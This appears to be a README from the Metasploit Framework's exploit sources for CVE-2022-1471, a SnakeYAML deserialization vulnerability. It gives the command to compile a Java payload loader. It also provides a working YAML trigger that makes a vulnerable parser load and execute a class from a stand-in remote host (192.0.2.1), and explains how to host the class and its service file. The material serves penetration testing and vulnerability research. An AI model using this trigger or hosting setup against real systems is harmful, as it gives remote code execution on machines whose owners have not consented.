external/source/exploits/CVE-2022-1471/README.md
# Overview
The Java file contained within will load and execute a Metasploit payload. It's intended to be loaded as part of the
exploit for CVE-2022-1471 which is a YAML deserialization vulnerability within the snakeyaml project.
See https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in for more information.
## Compiling
It's necessary to specify the Metasploit Payloads data directory as the class path when compiling the code. See the
[metasploit-payloads][1] repository for instructions on how to compile the main Java payloads and install the data
files.
Compile the Java source file using `javac -cp path/to/metasploit-framework/data/java MyScriptEngineFactory.java`.
## Usage
Trigger the deserialization using the following YAML:
```yaml
!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://192.0.2.1:8080/"]]]]
```
Host the compiled class on an HTTP server along with the file `/META-INF/services/javax.script.ScriptEngineFactory`. The
contents of this file should simply be the class name to load (`MyScriptEngineFactory`). See Metasploit's
`Msf::Exploit::Remote::Java::HTTP::ClassLoader` mixin for more information and the remaining components necessary to
deliver a Metasploit payload.
[1]: https://github.com/rapid7/metasploit-payloads/tree/master/java